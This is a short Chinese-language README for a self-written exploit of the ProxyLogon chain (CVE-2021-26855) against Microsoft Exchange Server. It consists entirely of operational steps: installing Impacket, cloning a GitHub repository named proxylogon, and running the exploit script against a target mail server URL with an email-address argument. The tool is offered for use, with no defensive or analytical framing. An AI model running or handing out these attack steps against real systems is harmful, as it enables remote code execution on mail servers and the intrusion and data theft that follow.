
针对 Microsoft Exchange Server 的 RCE 漏洞利用 (CVE-2021-26855)。
我针对 proxylogon 链(Microsoft Exchange Server - CVE-2021-26855)编写的漏洞利用程序
该漏洞利用程序使用 Impacket 包,安装方法如下:
user@host:~$ python3 -m pip install impacket
然后克隆漏洞利用仓库,并进入漏洞利用目录:
user@host:~$ git clone https://github.com/hakivvi/proxylogon.git && cd proxylogon
运行漏洞利用程序:
user@host:~$ python3 proxylogon.py http://mail.corp.com [email protected]